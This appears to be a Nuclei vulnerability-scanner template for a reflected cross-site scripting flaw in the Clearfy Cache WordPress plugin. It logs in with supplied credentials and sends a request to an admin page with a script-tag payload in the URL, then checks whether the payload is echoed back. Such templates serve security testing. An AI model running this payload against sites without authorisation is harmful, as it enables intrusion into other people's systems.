45 lines
1.3 KiB
YAML
45 lines
1.3 KiB
YAML
|
id: clearfy-cache-xss
|
||
|
|
||
|
info:
|
||
|
name: Clearfy Cache < 2.0.5 - Reflected Cross-Site Scripting
|
||
|
author: Akincibor
|
||
|
severity: medium
|
||
|
description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
|
||
|
reference:
|
||
|
- https://wpscan.com/vulnerability/a59e7102-13d6-4f1e-b7b1-75eae307e516
|
||
|
- https://wordpress.org/plugins/clearfy
|
||
|
tags: wp-plugin,xss,wp,wordpress,authenticated,clearfy-cache
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /wp-login.php HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Origin: {{RootURL}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||
|
|
||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||
|
- |
|
||
|
GET /wp-admin/admin.php?page=gonzales-wbcr_clearfy&action=index&wbcr_assets_manager=1&a"><script>alert(1)</script> HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
cookie-reuse: true
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- '"><script>alert(1)</script>'
|
||
|
- "Webcraftic Clearfy - WordPress optimization plugin"
|
||
|
condition: and
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- text/html
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|